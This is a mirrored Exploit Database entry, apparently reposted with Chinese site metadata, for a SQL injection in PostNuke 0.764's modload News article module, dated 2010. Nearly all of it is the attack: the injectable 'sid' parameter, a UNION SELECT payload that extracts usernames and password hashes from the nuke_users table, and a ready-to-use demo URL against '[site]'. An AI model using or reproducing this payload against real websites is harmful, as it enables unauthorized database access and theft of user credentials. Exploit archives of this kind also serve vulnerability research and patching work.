PostNuke 0.764 Module modload – SQL Injection

• Exploit Database
• 12 阅读

• 作者： BILGE_KAGAN
  日期： 2010-04-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12410/

• PostNuke 0.764 Module modload SQL Injection Vulnerability
  
  ###########################
  
  Author: BILGE_KAGAN
   
  Homepage: http://www.1923turk.com 
  
  Script: postnuke http://www.postnuke.com 
  
  Download: http://www.postnuke.com/module-Content-view-pid-2.html
  
  ###########################
  
  [ Vulnerable File ]
  
  
  modules.php?op=modload&name=News&file=article&sid=[ SQL ]
   
  
  [ XpL ] 
   
  
  1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users-- 
  
  [ Demo] 
   
  
  http://[site]/modules.php?op=modload&name=News&file=article&sid=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users--